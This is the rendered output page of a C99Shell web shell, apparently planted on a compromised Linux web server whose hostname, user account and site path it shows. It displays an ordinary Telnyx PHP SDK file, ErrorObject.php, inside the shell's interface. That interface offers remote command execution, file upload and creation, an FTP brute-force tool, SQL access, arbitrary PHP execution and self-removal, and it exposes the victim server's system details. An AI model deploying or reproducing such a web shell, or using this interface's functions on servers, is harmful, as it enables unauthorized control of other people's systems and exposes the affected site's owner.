!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/vendor/telnyx/telnyx-php/lib/   drwxr-xr-x
Free 29.3 GB of 117.98 GB (24.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ErrorObject.php (1.91 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Telnyx;

/**
 * Class ErrorObject.
 *
 * @property string $code - an application-specific error code, expressed as a stringified 5-digit integer [e.g. "10001"].
 * @property string $title - a short, human-readable summary of the problem.
 * @property string $detail - a human-readable explanation specific to this occurrence of the problem.
 * @property string $source - an object containing references to the source of the error, optionally including any of the following members:
 * @property string $pointer - a JSON Pointer [RFC6901] to the associated entity in the request document e.g. "/" for a primary object, or "/title" for a specific attribute.
 * @property string $parameter - a string indicating which URI query parameter caused the error.
 * @property string $meta - a meta object containing non-standard meta-information about the error. This will likely be a URL to the relevant documentation.
 */
class ErrorObject extends TelnyxObject
{
    
/**
     * Possible string representations of an error's code.
     *
     * @see https://developers.telnyx.com/docs/v2/development/api-guide/errors
     */

    /**
     * Refreshes this object using the provided values.
     *
     * @param array $values
     * @param null|array|string|Util\RequestOptions $opts
     * @param bool $partial defaults to false
     */
    
public function refreshFrom($values$opts$partial false)
    {
        
// Unlike most other API resources, the API will omit attributes in
        // error objects when they have a null value. We manually set default
        // values here to facilitate generic error handling.
        
$values \array_merge([
            
'code' => null,
            
'title' => null,
            
'detail' => null,
            
'source' => null,
            
'pointer' => null,
            
'parameter' => null,
            
'meta' => null,
        ], 
$values);

        
parent::refreshFrom($values$opts$partial);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--